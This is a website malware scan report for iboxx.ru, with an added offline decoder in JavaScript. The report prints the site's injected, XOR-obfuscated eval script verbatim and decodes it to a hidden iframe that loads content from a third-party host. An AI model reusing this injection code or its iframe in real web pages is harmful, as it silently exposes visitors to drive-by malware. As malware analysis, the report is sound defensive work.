Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iboxx.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iboxx.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status
http://iboxx.ru/ | 200 OK, Content-Length: 1765, Content-Type: text/html | malicious
http://iboxx.ru/test404page.js | 404 Not Found, Content-Length: 1411, Content-Type: text/html | clean

Malicious code in http://iboxx.ru/ (confirmed by antiviruses, see below). The injected script is a two-stage decoder: a hex blob (tcadg) and a decoder string (fscy) that is passed to eval. The decoder derives a one-byte XOR key from the checksum of its own source (the sum of its character codes, mod 0x64), XORs every hex byte of tcadg with that key and writes the result into the page with document.write. The result is a hidden 1x1 iframe that loads content from a third-party host.

Injected script:
tcadg='1d49554c4d1f1d434e45581f1d484753404c44015253421c03495555511b0e0e5656565b405140520f424f0e5748510e484f0f4246481e1012030156484555491c10014944484649551c10015255584d441c035748524843484d4855581b49484545444f031f1d0e484753404c441f1d0e434e45581f1d0e49554c4d1f';fscy="qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh);";eval(fscy);

Decoded script (stage 1, the string handed to eval):
qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh);

Decoded output (stage 2, what document.write inserts into the page):
<html><body><iframe src="http://wwwzapas.cn/vip/in.cgi?13" width=1 height=1 style="visibility:hidden"></iframe></body></html>

Antivirus reports:
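The decoder above can be reproduced statically, without handing the script to eval() or a browser. The following is an added example written for this page (it is not part of the scanner report or of the injected script itself); the two string literals are the tcadg and fscy values copied verbatim from the page, and the function names are my own. It derives the XOR key the same way the malware does (checksum of the decoder source mod 0x64), cross-checks it against a known-plaintext recovery from the first byte (a document.write payload starts with '<'), decodes the blob and pulls out the iframe target as an indicator.

```javascript
// Added example (not from the scanner report): offline re-implementation of the
// decoder found in http://iboxx.ru/, so the payload is recovered without eval() or
// document.write(). The two literals are copied verbatim from the injected script.
const TCADG = "1d49554c4d1f1d434e45581f1d484753404c44015253421c03495555511b0e0e5656565b405140520f424f0e5748510e484f0f4246481e1012030156484555491c10014944484649551c10015255584d441c035748524843484d4855581b49484545444f031f1d0e484753404c441f1d0e434e45581f1d0e49554c4d1f";
const FSCY = "qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh);";

// Key derivation exactly as the malware does it: sum of the char codes of the decoder's
// own source, mod 0x64 (100). Any edit to that source (a beautifier, a renamed variable)
// changes the key and turns the blob into garbage, so it must be fed the exact original text.
function checksumKey(decoderSource) {
  let sum = 0;
  for (let i = 0; i < decoderSource.length; i++) sum += decoderSource.charCodeAt(i);
  return sum % 0x64;
}

// XOR every byte of an even-length hex string with a one-byte key.
function xorHexDecode(hex, key) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error("payload is not an even-length hex string");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// Known-plaintext recovery: a document.write payload begins with '<', so the first
// byte XOR '<' gives the key even when only the hex blob survived (e.g. the decoder
// string was mangled by a formatter before it reached the analyst).
function recoverKeyFromFirstChar(hex, expectedFirstChar = "<") {
  return parseInt(hex.slice(0, 2), 16) ^ expectedFirstChar.charCodeAt(0);
}

// Extract iframe src attributes from the decoded HTML (the indicators worth reporting).
function extractIframeSources(html) {
  const out = [];
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Full static analysis of one sample: both key derivations are expected to agree.
function analyzeInjection(tcadg, fscy) {
  const keyFromChecksum = checksumKey(fscy);
  const keyFromPlaintext = recoverKeyFromFirstChar(tcadg);
  const html = xorHexDecode(tcadg, keyFromChecksum);
  return {
    keyFromChecksum,
    keyFromPlaintext,
    keysAgree: keyFromChecksum === keyFromPlaintext,
    html,
    iframeSources: extractIframeSources(html),
  };
}

console.log(JSON.stringify(analyzeInjection(TCADG, FSCY), null, 2));
```

Run it with node; for this sample both derivations give key 33 (0x21) and the decoded HTML is the hidden iframe shown above. The self-checksumming key is the part to remember: it means the decoder string has to be copied byte for byte, and it is also why the known-plaintext shortcut is worth having.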
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iboxx.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 19:52:47 GMT
Server: nginx/1.0.6
Content-Type: text/html; charset=windows-1251
Second query (visit from search engine):
GET / HTTP/1.1
Host: iboxx.ru
Referer: http://www.google.com/search?q=iboxx.ru
Result:
The response is the same as for the first query; no suspicious redirects were found.